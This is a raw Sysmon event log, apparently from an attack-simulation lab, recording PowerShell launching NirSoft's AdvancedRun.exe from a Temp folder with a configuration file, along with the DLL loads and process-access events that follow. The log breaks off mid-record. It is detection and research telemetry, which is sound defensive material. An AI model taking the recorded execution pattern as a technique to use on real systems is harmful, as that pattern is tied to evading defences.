734700x80000000000000004008435Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008434Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008433Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008432Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008431Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008430Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008429Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008428Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008427Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008426Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008425Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008424Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008423Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008420Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004008419Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004008418Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.816{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004008417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.817{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004007867Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:15.888{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000004007826Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.240{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007825Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.240{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007824Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.240{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007823Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.240{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007822Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.224{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007821Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.224{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007818Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.224{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007817Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.224{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007816Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.224{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007815Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.208{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007814Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.208{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007813Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.208{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004007812Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.208{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004007811Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.099{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007810Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 